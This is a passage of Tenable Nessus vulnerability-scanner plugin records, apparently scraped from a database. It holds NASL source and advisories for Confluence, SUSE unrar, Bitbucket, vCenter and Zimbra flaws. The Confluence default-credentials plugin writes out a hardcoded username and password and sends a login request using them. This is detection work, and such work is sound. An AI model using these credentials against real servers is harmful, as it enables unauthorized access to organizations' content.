only on Confluence's self-reported version number. This plugin will only run in 'Parnoid' scans.", "cvss3": {}, "published": "2022-07-21T00:00:00", "type": "nessus", "title": "Atlassian Confluence < 7.4.17 / 7.13.x < 7.13.6 / < 7.14.3 / 7.15.x < 7.15.2 / 7.16.x < 7.16.4 / 7.17.x < 7.17.2 (CONFSERVER-79483)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-26138"], "modified": "2022-12-08T00:00:00", "cpe": ["cpe:/a:atlassian:confluence"], "id": "CONFLUENCE_CONFSERVER-79483.NASL", "href": "https://www.tenable.com/plugins/nessus/163327", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(163327);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/08\");\n\n script_cve_id(\"CVE-2022-26138\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/19\");\n\n script_name(english:\"Atlassian Confluence < 7.4.17 / 7.13.x < 7.13.6 / < 7.14.3 / 7.15.x < 7.15.2 / 7.16.x < 7.16.4 / 7.17.x < 7.17.2 (CONFSERVER-79483)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Atlassian Confluence host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Atlassian Confluence installed on the remote host is prior to < 7.4.17 / 7.13.x < 7.13.6 / 7.14.x <\n7.14.3 / 7.15.x < 7.15.2 / 7.16.x < 7.16.4 / 7.17.x < 7.17.2. It is potentially affected by a hard-coded credential\nvulnerability if the 'Questions for Confluence' app is installed.\n\nThe Atlassian Questions For Confluence app for Confluence Server and Data Center creates a Confluence user account in\nthe confluence-users group with the username disabledsystemuser and a hardcoded password. A remote, unauthenticated\nattacker with knowledge of the hardcoded password could exploit this to log into Confluence and access all content\naccessible to users in the confluence-users group. This user account is created when installing versions 2.7.34, 2.7.35,\nand 3.0.2 of the app.(CVE-2022-26138)\n\nNote that Nessus has not tested for this issue but has instead relied only on Confluence's self-reported version\nnumber. This plugin will only run in 'Parnoid' scans.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://jira.atlassian.com/browse/CONFSERVER-79483\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Atlassian Confluence version 7.4.17, 7.13.6, 7.14.3, 7.15.2, 7.16.4, 7.17.2, 7.13.6, 7.14.3, 7.15.2, 7.16.4,\n7.17.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-26138\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/07/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/07/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/07/21\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:atlassian:confluence\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"confluence_detect.nasl\");\n script_require_keys(\"installed_sw/confluence\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 8080, 8090);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('http.inc');\n\nvar port = get_http_port(default:80);\nvar app_info = vcf::get_app_info(app:'confluence', port:port, webapp:true);\n\n# The vuln is in the Questions for Confluence app, not Confluence itself\n# We cannot determin if this is installed and/or the offending user account is present\nif (report_paranoia < 2) audit(AUDIT_POTENTIAL_VULN, 'Confluence', app_info.version);\n\nvar constraints = [\n { 'fixed_version' : '7.4.17', 'fixed_display' : '7.4.17 / 7.13.6 / 7.14.3 / 7.15.2 / 7.16.4 / 7.17.2' },\n { 'min_version' : '7.13.0', 'fixed_version' : '7.13.6' },\n { 'min_version' : '7.14.0', 'fixed_version' : '7.14.3' },\n { 'min_version' : '7.15.0', 'fixed_version' : '7.15.2' },\n { 'min_version' : '7.16.0', 'fixed_version' : '7.16.4' },\n { 'min_version' : '7.17.0', 'fixed_version' : '7.17.2' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-17T16:33:27", "description": "The remote confluence web application uses a known set of hard-coded default credentials of the 'Questions for Confluence' marketplace application. An attacker can exploit this to gain administrative access to the remote host.", "cvss3": {}, "published": "2022-08-12T00:00:00", "type": "nessus", "title": "Questions for Confluence App Default Credentials (CVE-2022-26138)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-26138"], "modified": "2022-12-07T00:00:00", "cpe": ["cpe:/a:atlassian:confluence"], "id": "CONFLUENCE_CVE-2022-26138.NASL", "href": "https://www.tenable.com/plugins/nessus/164091", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(164091);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/07\");\n\n script_cve_id(\"CVE-2022-26138\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/19\");\n\n script_name(english:\"Questions for Confluence App Default Credentials (CVE-2022-26138)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The application hosted on the remote web server uses a default set of known credentials.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote confluence web application uses a known set of hard-coded default credentials of the\n'Questions for Confluence' marketplace application. An attacker can exploit this to gain \nadministrative access to the remote host.\");\n # https://confluence.atlassian.com/doc/questions-for-confluence-security-advisory-2022-07-20-1142446709.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?56edf34e\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the application's default credentials.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-26138\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/07/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/07/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/08/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:atlassian:confluence\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"confluence_detect.nasl\");\n script_require_keys(\"installed_sw/confluence\");\n script_require_ports(\"Services/www\", 8080, 8090);\n\n exit(0);\n}\n\ninclude('http.inc');\ninclude('url_func.inc');\ninclude('vcf.inc');\ninclude('debug.inc');\n\nvar app_name = 'confluence';\nvar port = get_http_port(default:80);\nvar app_info = vcf::get_app_info(app:app_name, port:port, webapp:true);\nvar url = build_url(port:port, qs:app_info['path']);\n\n##\n# Try to authenticate with default disabledsystemuser/disabled1system1user6708 creds\n#\n# @param port - the port the application exists on\n# @return TRUE for successful authentication, otherwise FALSE\n##\nfunction try_default_creds(port)\n{\n dbg::detailed_log(lvl:1, src:FUNCTION_NAME, msg:'[trying default creds]');\n var res, post;\n post = 'os_username=disabledsystemuser&os_password=disabled1system1user6708&login=Log+in&os_destination=%2Findex.action';\n # Authenticate\n res = http_send_recv3(\n port : port,\n method : 'POST',\n item : '/dologin.action',\n data : post,\n content_type : \"application/x-www-form-urlencoded\",\n exit_on_fail : TRUE\n );\n\n dbg::detailed_log(lvl:1, src:FUNCTION_NAME, msg:'Attempted to login with: ' + http_last_sent_request());\n dbg::detailed_log(lvl:1, src:FUNCTION_NAME, msg:'Response was: ' + obj_rep(res));\n if ('HTTP/1.1 302' >< res[0] && 'X-Seraph-LoginReason: OK' >< res[1])\n {\n dbg::detailed_log(lvl:1, src:FUNCTION_NAME, msg:'[login confirmed][ ' + res[0] + '][' + res[1] + ']');\n return TRUE;\n }\n dbg::detailed_log(lvl:1, src:FUNCTION_NAME, msg:'[login failed][ ' + res[0] + '][' + res[1] + ']');\n return FALSE;\n}\n\nvar can_auth = try_default_creds(port:port);\n\nvar report = NULL;\nif (can_auth)\n{\n report = 'Nessus was able to gain access to the remote confluence app\\n' +\n 'using the following set of credentials:\\n' +\n '\\n Username : disabledsystemuser' +\n '\\n Password : disabled1system1user6708';\n\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:report);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app_name, url);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-17T16:30:13", "description": "The remote SUSE Linux SLES12 host has packages installed that are affected by a vulnerability as referenced in the SUSE- SU-2022:1760-1 advisory.\n\n - RARLAB UnRAR before 6.12 on Linux and UNIX allows directory traversal to write to files during an extract (aka unpack) operation, as demonstrated by creating a ~/.ssh/authorized_keys file. NOTE: WinRAR and Android RAR are unaffected. (CVE-2022-30333)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-05-20T00:00:00", "type": "nessus", "title": "SUSE SLES12 Security Update : unrar (SUSE-SU-2022:1760-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-30333"], "modified": "2023-03-10T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libunrar-devel", "p-cpe:/a:novell:suse_linux:libunrar5_6_1", "p-cpe:/a:novell:suse_linux:unrar", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2022-1760-1.NASL", "href": "https://www.tenable.com/plugins/nessus/161392", "sourceData": "##\n# (C) Tenable, Inc.\n#\n# The package checks in this plugin were extracted from\n# SUSE update advisory SUSE-SU-2022:1760-1. The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(161392);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/03/10\");\n\n script_cve_id(\"CVE-2022-30333\");\n script_xref(name:\"SuSE\", value:\"SUSE-SU-2022:1760-1\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/30\");\n\n script_name(english:\"SUSE SLES12 Security Update : unrar (SUSE-SU-2022:1760-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SLES12 host has packages installed that are affected by a vulnerability as referenced in the SUSE-\nSU-2022:1760-1 advisory.\n\n - RARLAB UnRAR before 6.12 on Linux and UNIX allows directory traversal to write to files during an extract\n (aka unpack) operation, as demonstrated by creating a ~/.ssh/authorized_keys file. NOTE: WinRAR and\n Android RAR are unaffected. (CVE-2022-30333)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1199349\");\n # https://lists.suse.com/pipermail/sle-security-updates/2022-May/011102.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?418ef299\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2022-30333\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected libunrar-devel, libunrar5_6_1 and / or unrar packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-30333\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'UnRAR Path Traversal in Zimbra (CVE-2022-30333)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/05/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/05/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/05/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libunrar-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libunrar5_6_1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:unrar\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item(\"Host/SuSE/release\");\nif (isnull(os_release) || os_release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nvar os_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'SUSE');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, 'SUSE SLES12', 'SUSE (' + os_ver + ')');\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'SUSE (' + os_ver + ')', cpu);\n\nvar service_pack = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(service_pack)) service_pack = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(5)$\", string:service_pack))) audit(AUDIT_OS_NOT, \"SLES12 SP5\", os_ver + \" SP\" + service_pack);\n\nvar pkgs = [\n {'reference':'libunrar-devel-5.6.1-4.8.1', 'sp':'5', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.5', 'sle-sdk-release-12.5', 'sles-release-12.5']},\n {'reference':'libunrar5_6_1-5.6.1-4.8.1', 'sp':'5', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.5', 'sle-sdk-release-12.5', 'sles-release-12.5']},\n {'reference':'unrar-5.6.1-4.8.1', 'sp':'5', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.5', 'sles-release-12.5']}\n];\n\nvar ltss_caveat_required = FALSE;\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var exists_check = NULL;\n var rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) _release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) _cpu = package_array['cpu'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && _release) {\n if (exists_check) {\n var check_flag = 0;\n foreach var check (exists_check) {\n if (!rpm_exists(release:_release, rpm:check)) continue;\n check_flag++;\n }\n if (!check_flag) continue;\n }\n if (rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'libunrar-devel / libunrar5_6_1 / unrar');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-06T12:42:21", "description": "The version of Atlassian Bitbucket installed on the remote host 7.0.0 prior to 7.6.17, 7.7.0 prior to 7.17.10, 7.18.0 prior to 7.21.4, 8.0 prior to 8.0.3, 8.1 prior to 8.1.3, 8.2 prior to 8.2.2 or 8.3 prior to 8.3.1. It is, therefore, affected by a remote code execution vulnerability. A remote attacker with read permissions to a public or private Bitbucket repository can send a malicious HTTP request leading to arbitrary code execution.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-09-07T00:00:00", "type": "nessus", "title": "Atlassian Bitbucket < 7.6.17 / 7.17.10 / 7.21.4 / 8.0.4 / 8.1.3 / 8.2.2 / 8.3.1 RCE", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-36804"], "modified": "2023-01-26T00:00:00", "cpe": ["cpe:/a:atlassian:bitbucket"], "id": "BITBUCKET_8_3_1.NASL", "href": "https://www.tenable.com/plugins/nessus/164810", "sourceData": "#%NASL_MIN_LEVEL 80900\n#\n# (C) Tenable, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(164810);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/26\");\n\n script_cve_id(\"CVE-2022-36804\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/10/21\");\n\n script_name(english:\"Atlassian Bitbucket < 7.6.17 / 7.17.10 / 7.21.4 / 8.0.4 / 8.1.3 / 8.2.2 / 8.3.1 RCE\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Atlassian Bitbucket installed on the remote host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Atlassian Bitbucket installed on the remote host 7.0.0 prior to 7.6.17, 7.7.0 prior to 7.17.10, 7.18.0\nprior to 7.21.4, 8.0 prior to 8.0.3, 8.1 prior to 8.1.3, 8.2 prior to 8.2.2 or 8.3 prior to 8.3.1. It is, therefore,\naffected by a remote code execution vulnerability. A remote attacker with read permissions to a public or private\nBitbucket repository can send a malicious HTTP request leading to arbitrary code execution.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://jira.atlassian.com/browse/BSERV-13438\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 7.6.17, 7.17.10, 7.21.4, 8.0.3, 8.1.3, 8.2.2, 8.3.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-36804\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Bitbucket Git Command Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/08/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/08/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/09/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:atlassian:bitbucket\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"bitbucket_detect.nbin\");\n script_require_keys(\"installed_sw/bitbucket\");\n script_require_ports(\"Services/www\", 7990);\n\n exit(0);\n}\ninclude('http.inc');\ninclude('vcf.inc');\n\nvar port = get_http_port(default:7990);\n\nvar app = 'bitbucket';\n\nvar app_info = vcf::get_app_info(app:app, port:port, webapp:TRUE);\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nvar constraints = [\n { 'min_version' : '7.0.0', 'fixed_version' : '7.6.17' },\n { 'min_version' : '7.7.0', 'fixed_version' : '7.17.10' },\n { 'min_version' : '7.18.0', 'fixed_version' : '7.21.4' },\n { 'min_version' : '8.0.0', 'fixed_version' : '8.0.3' },\n { 'min_version' : '8.1.0', 'fixed_version' : '8.1.3' },\n { 'min_version' : '8.2.0', 'fixed_version' : '8.2.2' },\n { 'min_version' : '8.3.0', 'fixed_version' : '8.3.1' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-06T12:50:46", "description": "The version of Atlassian Bitbucket installed on the remote host is allows remote attackers with read permissions to a public or private Bitbucket repository to execute code by sending a malicious HTTP request.", "cvss3": {}, "published": "2023-02-09T00:00:00", "type": "nessus", "title": "Atlassian Bitbucket RCE (CVE-2022-36804)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-36804"], "modified": "2023-05-31T00:00:00", "cpe": ["cpe:/a:atlassian:bitbucket"], "id": "BITBUCKET_CVE-2022-36804.NBIN", "href": "https://www.tenable.com/plugins/nessus/171253", "sourceData": "Binary data bitbucket_cve-2022-36804.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-02T14:21:15", "description": "An arbitrary file upload vulnerability exists in vCenter Server. An unauthenticated, remote attacker with network access to port 443 on vCenter Server may exploit this issue to execute code on vCenter Server by uploading a specially crafted file.", "cvss3": {}, "published": "2021-10-06T00:00:00", "type": "nessus", "title": "VMware vCenter Server Arbitrary File Upload (VMSA-2021-0020)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2023-05-31T00:00:00", "cpe": ["cpe:/a:vmware:vcenter_server"], "id": "VMWARE_VCENTER_CVE-2021-22005.NBIN", "href": "https://www.tenable.com/plugins/nessus/153889", "sourceData": "Binary data vmware_vcenter_cve-2021-22005.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-01T14:22:53", "description": "The vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).", "cvss3": {}, "published": "2021-02-25T00:00:00", "type": "nessus", "title": "VMware vCenter Server RCE (direct check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-21972"], "modified": "2023-05-31T00:00:00", "cpe": ["cpe:/a:vmware:vcenter_server"], "id": "VMWARE_VCENTER_CVE-2021-21972.NBIN", "href": "https://www.tenable.com/plugins/nessus/146825", "sourceData": "Binary data vmware_vcenter_cve-2021-21972.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-17T16:34:10", "description": "According to its self-reported version number, Zimbra Collaboration Server is affected by a multiple vulnerabilities, including the following:\n\n - An issue was discovered in ProxyServlet.java in the /proxy servlet in Zimbra Collaboration Suite (ZCS) 8.8.15 and 9.0. The value of the X-Forwarded-Host header overwrites the value of the Host header in proxied requests. The value of X-Forwarded-Host header is not checked against the whitelist of hosts that ZCS is allowed to proxy to (the zimbraProxyAllowedDomains setting). (CVE-2022-37041)\n\n - Zimbra Collaboration Suite (ZCS) 8.8.15 and 9.0 has mboximport functionality that receives a ZIP archive and extracts files from it. By bypassing authentication (i.e., not having an authtoken), an attacker can upload arbitrary files to the system, leading to directory traversal and remote code execution. NOTE: this issue exists because of an incomplete fix for CVE-2022-27925. (CVE-2022-37042)\n\n - An issue was discovered in the webmail component in Zimbra Collaboration Suite (ZCS) 8.8.15 and 9.0. When using preauth, CSRF tokens are not checked on some POST endpoints. Thus, when an authenticated user views an attacker-controlled page, a request will be sent to the application that appears to be intended. The CSRF token is omitted from the request, but the request still succeeds. (CVE-2022-37043)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-08-23T00:00:00", "type": "nessus", "title": "Zimbra Collaboration Server 8.8.x < 8.8.15 Patch 33 / 9.0.0 < 9.0.0 Patch 26 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-2068", "CVE-2022-24407", "CVE-2022-27925", "CVE-2022-37041", "CVE-2022-37042", "CVE-2022-37043"], "modified": "2023-02-17T00:00:00", "cpe": ["cpe:/a:zimbra:collaboration_suite"], "id": "ZIMBRA_9_0_0_P26.NASL", "href": "https://www.tenable.com/plugins/nessus/164341", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(164341);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/17\");\n\n script_cve_id(\n \"CVE-2022-2068\",\n \"CVE-2022-24407\",\n \"CVE-2022-37041\",\n \"CVE-2022-37042\",\n \"CVE-2022-37043\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/09/01\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0004\");\n\n script_name(english:\"Zimbra Collaboration Server 8.8.x < 8.8.15 Patch 33 / 9.0.0 < 9.0.0 Patch 26 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a web application that is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, Zimbra Collaboration Server is affected by a multiple vulnerabilities,\nincluding the following:\n\n - An issue was discovered in ProxyServlet.java in the /proxy servlet in Zimbra Collaboration Suite (ZCS)\n 8.8.15 and 9.0. The value of the X-Forwarded-Host header overwrites the value of the Host header in\n proxied requests. The value of X-Forwarded-Host header is not checked against the whitelist of hosts that\n ZCS is allowed to proxy to (the zimbraProxyAllowedDomains setting). (CVE-2022-37041)\n\n - Zimbra Collaboration Suite (ZCS) 8.8.15 and 9.0 has mboximport functionality that receives a ZIP archive\n and extracts files from it. By bypassing authentication (i.e., not having an authtoken), an attacker can\n upload arbitrary files to the system, leading to directory traversal and remote code execution. NOTE: this\n issue exists because of an incomplete fix for CVE-2022-27925. (CVE-2022-37042)\n\n - An issue was discovered in the webmail component in Zimbra Collaboration Suite (ZCS) 8.8.15 and 9.0. When\n using preauth, CSRF tokens are not checked on some POST endpoints. Thus, when an authenticated user views\n an attacker-controlled page, a request will be sent to the application that appears to be intended. The\n CSRF token is omitted from the request, but the request still succeeds. (CVE-2022-37043)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P33\");\n script_set_attribute(attribute:\"see_also\", value:\"https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P26\");\n script_set_attribute(attribute:\"see_also\", value:\"https://wiki.zimbra.com/wiki/Security_Center\");\n 